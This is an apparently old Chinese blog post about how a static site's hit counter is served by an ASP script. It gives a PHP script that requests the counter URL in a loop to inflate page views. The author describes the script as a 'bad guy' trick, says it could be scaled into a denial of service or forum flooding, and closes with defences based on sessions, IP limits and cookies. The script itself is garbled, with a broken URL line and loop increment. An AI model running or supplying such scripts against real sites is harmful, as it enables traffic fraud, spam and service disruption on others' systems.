今天無意間看到一個網站,它的計數器能夠在靜態頁里更新,我想,應該是使用js來做的,打開源代碼一看,果然是:
<div align=center><SPAN class=Article_tdbgall>
<script language=’javascript’ src=’/Article/GetHits.asp?ArticleID=759’></script>
更新時間:2005-5-27</SPAN>
</div>
點擊數后面是一個asp文件去處理的,那么我打開這個文件看看:
document.write(’210’);
是吧,就是GetHists.asp文件處理ArticleID后提取結果后輸出次數:document.write(’次數’),再靜態頁里就能夠直接引用了。
壞人終究是壞人,那么我就想,如何能夠迅速提升點擊數呢?手工刷新的話不是很類,恩,趕緊寫個PHP程序來自動的去訪問這個文件。
PHP代碼如下:
<?php
/* access_url.php */
define(SUM, 1000); //需要訪問的次數
define(L_TIME, 1000); //強制腳本執行的時間
define(S_TIME, 1); //每次訪問之間休眠的時間
$url = "set_time_limit(L_TIME);
//訪問指定URL函數knowsky.com
function access_url($url)
{
if ($url==’’) return false;
$fp = fopen($url, ’r’) or exit(’Open url faild!’);
if ($fp) {
while (!feof($fp)) {
$file = fgets($fp);
echo $file."\n<p> </p>\n";
}
unset($file);
}
}
//進行測試
for ($i=0; $i<SUM; $i ) {
access_url($url);
sleep(S_TIME);
}
?>
運行上面的程序,那么就會連續訪問指定的URL地址,那么自然這個訪問次數就會連續增加,達到灌水的效果。如果是流量大,而且用多程序去運行的話,那么很容易就會達到拒絕服務(DoS)的效果了。如果對方的防范措施,把代碼修改一下針對論壇進行提交,很容易實現論壇灌水的效果。
防范方法:
1. 代碼中使用Session機制,當用戶提交的時候生成一個Session ID,提交內容的時候判斷是否已經提交,如果已提交那么就不允許刷。
2. 當用戶提交以后記錄用戶的IP地址,如果指定時間內再提交的話就不允許再提交。
3. 當用戶提交內容以后,在用戶客戶端寫入Cookie,如果用戶再次提交先檢查客戶端是否有Cookie來確定是否允許提交。
還有很多其他方法,可以去搜索一下,或者發揮自己的想象力,做的更好。